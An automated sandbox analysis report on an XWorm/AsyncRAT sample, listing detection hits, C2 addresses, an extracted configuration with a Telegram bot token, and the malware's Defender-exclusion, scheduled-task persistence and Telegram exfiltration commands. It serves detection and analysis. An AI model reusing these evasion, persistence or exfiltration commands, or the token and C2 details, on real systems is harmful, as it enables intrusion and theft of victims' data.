0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x88f4:$s6: VirtualBox 0x21aae:$s6: VirtualBox 0x2bcee:$s6: VirtualBox 0x8852:$s8: Win32_ComputerSystem 0x21a0c:$s8: Win32_ComputerSystem 0x2bc4c:$s8: Win32_ComputerSystem 0x92d4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2245e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2c69e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9371:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x224fb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2c73b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9486:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x22610:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2c850:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8f4c:$cnc4: POST / HTTP/1.1 0x2210c:$cnc4: POST / HTTP/1.1 0x2c34c:$cnc4: POST / HTTP/1.1
Click to see the 24 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\adawsfaefasfasfg.exe" , ParentImage: C:\Users\user\adawsfaefasfasfg.exe, ParentProcessId: 7732, ParentProcessName: adawsfaefasfasfg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', ProcessId: 8024, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\adawsfaefasfasfg.exe" , ParentImage: C:\Users\user\adawsfaefasfasfg.exe, ParentProcessId: 7732, ParentProcessName: adawsfaefasfasfg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', ProcessId: 8024, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Systen User, EventID: 13, EventType: SetValue, Image: C:\Users\user\adawsfaefasfasfg.exe, ProcessId: 7732, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Systen User

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\Systen User", CommandLine: "C:\Users\user\AppData\Roaming\Systen User", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Systen User, NewProcessName: C:\Users\user\AppData\Roaming\Systen User, OriginalFileName: C:\Users\user\AppData\Roaming\Systen User, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Systen User", ProcessId: 4872, ProcessName: Systen User

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\adawsfaefasfasfg.exe, ProcessId: 7732, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systen User.lnk

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\adawsfaefasfasfg.exe" , ParentImage: C:\Users\user\adawsfaefasfasfg.exe, ParentProcessId: 7732, ParentProcessName: adawsfaefasfasfg.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User", ProcessId: 8108, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\adawsfaefasfasfg.exe" , ParentImage: C:\Users\user\adawsfaefasfasfg.exe, ParentProcessId: 7732, ParentProcessName: adawsfaefasfasfg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', ProcessId: 8024, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5716, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Win32/XWorm Checkin via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T22:45:53.124203+0100	2853685	1	A Network Trojan was detected	192.168.2.9	49825	149.154.167.220	443	TCP
2024-12-06T22:46:51.511796+0100	2853685	1	A Network Trojan was detected	192.168.2.9	49958	149.154.167.220	443	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T22:46:18.826308+0100	2852870	1	Malware Command and Control Activity Detected	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:46:19.602049+0100	2852870	1	Malware Command and Control Activity Detected	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:46:30.092229+0100	2852870	1	Malware Command and Control Activity Detected	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:46:41.372777+0100	2852870	1	Malware Command and Control Activity Detected	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:46:49.604166+0100	2852870	1	Malware Command and Control Activity Detected	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:46:52.653608+0100	2852870	1	Malware Command and Control Activity Detected	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:47:01.107348+0100	2852870	1	Malware Command and Control Activity Detected	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:47:02.686350+0100	2852870	1	Malware Command and Control Activity Detected	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:47:13.928949+0100	2852870	1	Malware Command and Control Activity Detected	147.185.221.22	12886	192.168.2.9	49977	TCP
2024-12-06T22:47:16.427395+0100	2852870	1	Malware Command and Control Activity Detected	147.185.221.22	12886	192.168.2.9	49853	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T22:46:18.858988+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.9	49853	147.185.221.22	12886	TCP
2024-12-06T22:46:30.094220+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.9	49853	147.185.221.22	12886	TCP
2024-12-06T22:46:41.375960+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.9	49853	147.185.221.22	12886	TCP
2024-12-06T22:46:52.655477+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.9	49853	147.185.221.22	12886	TCP
2024-12-06T22:47:01.117066+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.9	49853	147.185.221.22	12886	TCP
2024-12-06T22:47:13.968839+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.9	49977	147.185.221.22	12886	TCP
2024-12-06T22:47:15.277941+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.9	49853	147.185.221.22	12886	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T22:46:19.602049+0100	2852874	1	Malware Command and Control Activity Detected	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:46:49.604166+0100	2852874	1	Malware Command and Control Activity Detected	147.185.221.22	12886	192.168.2.9	49853	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T22:46:18.119385+0100	2855924	1	Malware Command and Control Activity Detected	192.168.2.9	49853	147.185.221.22	12886	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ozgpPwVAu1.exe

Avira: detected

Antivirus detection for URL or domain

Source: carolina-comes.gl.at.ply.gg

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\adawsfaefasfasfg.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\wasdwasfwasfs.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\Systen User	Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: 00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "carolina-comes.gl.at.ply.gg", "147.185.221.22"], "Port": 12886, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg", "Telegram Chatid": "7538845070", "Version": "XWorm V5.2"}
Source: adawsfaefasfasfg.exe.7732.2.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage"}

Multi AV Scanner detection for submitted file

Source: ozgpPwVAu1.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\adawsfaefasfasfg.exe	Joe Sandbox ML: detected
Source: C:\Users\user\wasdwasfwasfs.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Systen User	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: ozgpPwVAu1.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack	String decryptor: 127.0.0.1,carolina-comes.gl.at.ply.gg,147.185.221.22
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack	String decryptor: 12886
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack	String decryptor: <123456789>
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack	String decryptor: XWorm V5.2
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack	String decryptor: USB.exe

Source: ozgpPwVAu1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49958 version: TLS 1.2

Source: ozgpPwVAu1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:49977 -> 147.185.221.22:12886
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:49853 -> 147.185.221.22:12886
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.22:12886 -> 192.168.2.9:49977
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.9:49977 -> 147.185.221.22:12886
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.22:12886 -> 192.168.2.9:49853
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.9:49853 -> 147.185.221.22:12886
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 147.185.221.22:12886 -> 192.168.2.9:49853
Source: Network traffic	Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.9:49825 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.9:49958 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 127.0.0.1
Source: Malware configuration extractor	URLs: carolina-comes.gl.at.ply.gg
Source: Malware configuration extractor	URLs: 147.185.221.22

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 3.0.wasdwasfwasfs.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.adawsfaefasfasfg.exe.eb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\wasdwasfwasfs.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\adawsfaefasfasfg.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Systen User, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.9:49853 -> 147.185.221.22:12886

Source: global traffic	HTTP traffic detected: GET /bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=7538845070&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE3C0EEEB514F72781BA2%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ELOET%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=7538845070&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE3C0EEEB514F72781BA2%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ELOET%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

ASN Name: SALSGIVERUS SALSGIVERUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=7538845070&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE3C0EEEB514F72781BA2%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ELOET%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=7538845070&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE3C0EEEB514F72781BA2%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ELOET%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: carolina-comes.gl.at.ply.gg

Source: adawsfaefasfasfg.exe, 00000002.00000002.2592447973.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: powershell.exe, 00000010.00000002.1807879075.0000012AF6474000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000010.00000002.1807879075.0000012AF6474000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000008.00000002.1498209916.0000015D7A900000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000008.00000002.1498209916.0000015D7A900000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro/pki/crl/productCerAut_2010-06-2
Source: powershell.exe, 00000016.00000002.2385958068.000001286FCB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: qmgr.db.31.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.31.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.31.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.31.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.31.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000001F.00000002.2580889401.0000024CFD102000.00000004.00000020.00020000.00000000.sdmp, qmgr.db.31.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.31.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: ozgpPwVAu1.exe, 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2591449977.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, adawsfaefasfasfg.exe.0.dr, wasdwasfwasfs.exe.0.dr, Systen User.2.dr	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000009.00000002.1470720955.000002853FD37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1761595477.0000013FDF314000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1750246959.0000012AEDCC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2055474118.0000017199AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.1823526191.0000013FE78E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://osoft.co
Source: powershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1413749213.0000015D62429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1412534773.000002852FEE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1555270609.0000013FCF4C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1551198166.0000012ADDE79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1878175975.0000017189C9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: adawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2591449977.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1413749213.0000015D62201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1412534773.000002852FCC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1555270609.0000013FCF2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1551198166.0000012ADDC51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1878175975.0000017189A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2136055333.0000012857861000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1413749213.0000015D62429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1412534773.000002852FEE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1555270609.0000013FCF4C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1551198166.0000012ADDE79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1878175975.0000017189C9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000E.00000002.1820911519.0000013FE7850000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
Source: powershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1498209916.0000015D7A900000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pki/certs/Miut_2010-06-23.cr
Source: powershell.exe, 00000009.00000002.1492888192.00000285480D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 0000000E.00000002.1819411525.0000013FE7783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.$
Source: powershell.exe, 0000000E.00000002.1823526191.0000013FE78E3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2396145614.0000012870040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000016.00000002.2393163849.000001286FE40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coO
Source: powershell.exe, 00000009.00000002.1497525479.000002854858D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coj
